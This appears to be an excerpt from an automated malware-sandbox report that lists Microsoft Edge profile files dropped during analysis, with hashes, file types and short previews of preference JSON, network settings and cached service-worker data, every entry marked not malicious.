                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\fa201b82-10e8-4a2b-8d09-ec16cd71c292.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1419
                                                                                                                                                                                                                                                                        Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                        MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                        SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                        SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                        SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                        Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                        MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                        SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                        SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                        SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):9817
                                                                                                                                                                                                                                                                        Entropy (8bit):5.11837215286181
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:stBkdphsBoTsZihUkbBB8YbV+FBjQA66W5aFIMYrPbYJ:stBQhsBoTfh1bGhQx6W5aTY8
                                                                                                                                                                                                                                                                        MD5:B5E90688EDF3EFED75B3014F1147EF71
                                                                                                                                                                                                                                                                        SHA1:ECB5A8A488B62F342061805D00BE0DA034E78ABF
                                                                                                                                                                                                                                                                        SHA-256:AF83A0296C97075FBEA48CFFF2492165B88F5EBD78878860ADA329395912F55B
                                                                                                                                                                                                                                                                        SHA-512:9B1AF02D60FAAB15AF82869C403481B51EC2FFA573E37ACFB882E9006A8138BA279718C905DB6D84FC501C0E0758ACE0D95C10EEA165195E77CA86A2CEC13E51
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379757632293900","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF40386.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):9817
                                                                                                                                                                                                                                                                        Entropy (8bit):5.11837215286181
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:stBkdphsBoTsZihUkbBB8YbV+FBjQA66W5aFIMYrPbYJ:stBQhsBoTfh1bGhQx6W5aTY8
                                                                                                                                                                                                                                                                        MD5:B5E90688EDF3EFED75B3014F1147EF71
                                                                                                                                                                                                                                                                        SHA1:ECB5A8A488B62F342061805D00BE0DA034E78ABF
                                                                                                                                                                                                                                                                        SHA-256:AF83A0296C97075FBEA48CFFF2492165B88F5EBD78878860ADA329395912F55B
                                                                                                                                                                                                                                                                        SHA-512:9B1AF02D60FAAB15AF82869C403481B51EC2FFA573E37ACFB882E9006A8138BA279718C905DB6D84FC501C0E0758ACE0D95C10EEA165195E77CA86A2CEC13E51
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379757632293900","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF44320.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):9817
                                                                                                                                                                                                                                                                        Entropy (8bit):5.11837215286181
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:stBkdphsBoTsZihUkbBB8YbV+FBjQA66W5aFIMYrPbYJ:stBQhsBoTfh1bGhQx6W5aTY8
                                                                                                                                                                                                                                                                        MD5:B5E90688EDF3EFED75B3014F1147EF71
                                                                                                                                                                                                                                                                        SHA1:ECB5A8A488B62F342061805D00BE0DA034E78ABF
                                                                                                                                                                                                                                                                        SHA-256:AF83A0296C97075FBEA48CFFF2492165B88F5EBD78878860ADA329395912F55B
                                                                                                                                                                                                                                                                        SHA-512:9B1AF02D60FAAB15AF82869C403481B51EC2FFA573E37ACFB882E9006A8138BA279718C905DB6D84FC501C0E0758ACE0D95C10EEA165195E77CA86A2CEC13E51
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379757632293900","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4b85f.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):9817
                                                                                                                                                                                                                                                                        Entropy (8bit):5.11837215286181
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:stBkdphsBoTsZihUkbBB8YbV+FBjQA66W5aFIMYrPbYJ:stBQhsBoTfh1bGhQx6W5aTY8
                                                                                                                                                                                                                                                                        MD5:B5E90688EDF3EFED75B3014F1147EF71
                                                                                                                                                                                                                                                                        SHA1:ECB5A8A488B62F342061805D00BE0DA034E78ABF
                                                                                                                                                                                                                                                                        SHA-256:AF83A0296C97075FBEA48CFFF2492165B88F5EBD78878860ADA329395912F55B
                                                                                                                                                                                                                                                                        SHA-512:9B1AF02D60FAAB15AF82869C403481B51EC2FFA573E37ACFB882E9006A8138BA279718C905DB6D84FC501C0E0758ACE0D95C10EEA165195E77CA86A2CEC13E51
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379757632293900","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):25012
                                                                                                                                                                                                                                                                        Entropy (8bit):5.568024908994013
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:JLGwrc/hWPuMfXe8F1+UoAYDCx9Tuqh0VfUC9xbog/OV3+tbnrwagpTtub:JLGwrc/hWPuMfXeu1ja6ob0DtM
                                                                                                                                                                                                                                                                        MD5:42CFC8D491BD406A5DA5503F995988B2
                                                                                                                                                                                                                                                                        SHA1:2BAD7A8FC5C5A1706487923C2950AFE2541D051D
                                                                                                                                                                                                                                                                        SHA-256:71762A6570E0D5338977F6C743CBB57DBA8A4F2FB5B858EC8AC580F51EC40B4F
                                                                                                                                                                                                                                                                        SHA-512:84D1ADC1C73BB8B2FEEE910859BCBD253E849A363D9164FF7FF524C1BFE77689E58FB066593EAB0C65B20A18349FCC9C502AFA029734991709B3B658A67E5160
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379757631686215","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379757631686215","location":5,"ma

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3f5da.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):25012
                                                                                                                                                                                                                                                                        Entropy (8bit):5.568024908994013
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:JLGwrc/hWPuMfXe8F1+UoAYDCx9Tuqh0VfUC9xbog/OV3+tbnrwagpTtub:JLGwrc/hWPuMfXeu1ja6ob0DtM
                                                                                                                                                                                                                                                                        MD5:42CFC8D491BD406A5DA5503F995988B2
                                                                                                                                                                                                                                                                        SHA1:2BAD7A8FC5C5A1706487923C2950AFE2541D051D
                                                                                                                                                                                                                                                                        SHA-256:71762A6570E0D5338977F6C743CBB57DBA8A4F2FB5B858EC8AC580F51EC40B4F
                                                                                                                                                                                                                                                                        SHA-512:84D1ADC1C73BB8B2FEEE910859BCBD253E849A363D9164FF7FF524C1BFE77689E58FB066593EAB0C65B20A18349FCC9C502AFA029734991709B3B658A67E5160
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379757631686215","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379757631686215","location":5,"ma

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2394
                                                                                                                                                                                                                                                                        Entropy (8bit):5.814661473585884
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:F2emwMrd68fBlkrdod+Ird6/BlKrd1Bl7:F1mwMx68YxooIx6+x1
                                                                                                                                                                                                                                                                        MD5:3E9FB17F69F06E3C7A46F17BC258DE67
                                                                                                                                                                                                                                                                        SHA1:49DC390A1EE082AD265F722F0BE5B1FD9B90D319
                                                                                                                                                                                                                                                                        SHA-256:641B04826238BA9EB9324BA9A57D23C06E78FC264EA5542EC83C3B0EE5F8559C
                                                                                                                                                                                                                                                                        SHA-512:9C251D219A04C85CCDFADC4643B4818700E902A32E6325D3A8C82415F4AE13F97DE62D5C5E82D4DDD27CA7BA4B14AD344B0DC0AF64558F1452C798B544691475
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..R;.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x..................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):299
                                                                                                                                                                                                                                                                        Entropy (8bit):5.175686250872526
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF4s1923oH+TcwtE/a252KLlmF1rM+q2P923oH+TcwtE/a2ZIFUv:xYeb8xLmM+v4Yeb8J2FUv
                                                                                                                                                                                                                                                                        MD5:9A83B910079572CF1733F9718DED663C
                                                                                                                                                                                                                                                                        SHA1:D7A0D136DF2A153BF5FEAE2D60F159A8D9D407EC
                                                                                                                                                                                                                                                                        SHA-256:F8416BD35380944B70F622F07B7C0DE040EAB39947A41F56828E8FE3DB0E6700
                                                                                                                                                                                                                                                                        SHA-512:4010EC8466D5107E85F03F9C688AC0A94BFE4923F58D96DC28072C5105B082535697DA057B1962D95B5311432BB608145C6A7F96CEE373C499A56D64DBA0893F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:49.837 138c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/27-02:20:49.858 138c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):114579
                                                                                                                                                                                                                                                                        Entropy (8bit):5.578627689108091
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekFj6lP:J9LyxPXfOxr1lMe1nL/5L/TXE6n7dk
                                                                                                                                                                                                                                                                        MD5:E9C75B363D2A8CCF3411B5EE50193293
                                                                                                                                                                                                                                                                        SHA1:C430CBCE7FD114AC6C0366BD1217A93DCD6D6374
                                                                                                                                                                                                                                                                        SHA-256:1CE8278D380D9A3BE5F56A9269AF3849566ED722631A53A407083A348B70DFB6
                                                                                                                                                                                                                                                                        SHA-512:0CA8109BD57F8B4F05E511FCE772026759274138EECDDA3A2DE509439661933B0B556FBEBC6929A0276E60AE64BE4F6C09420E4C22CF1AD1E8454E8802DDCFC4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):189105
                                                                                                                                                                                                                                                                        Entropy (8bit):6.387104041490994
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:2MR/cGSU/wvXbwA54HL/8cTuyGvgfqyc56IngTU9LLd:p/wvEAKL/9qmfq8Qd
                                                                                                                                                                                                                                                                        MD5:8588BE8FCEEB9E81D7053ED3C785E8F4
                                                                                                                                                                                                                                                                        SHA1:DE5E673C283A23B6920355F165D1908F9EACD961
                                                                                                                                                                                                                                                                        SHA-256:8D8C37FE9A875C0EE0B1F813456280F7C7D5EC9E3A08C3E6B2BBD8434A7E385E
                                                                                                                                                                                                                                                                        SHA-512:B775962D29B411A82997AD38DDA776F84D3288E21227319A8F89D02575CAEE46C7BE9ADA8431C1CF21FFC424F1A2396C83BEB834FACF8B8FFDF3DBB8218D5EAE
                                                                                                                                                                                                                                                                        Malicious:false
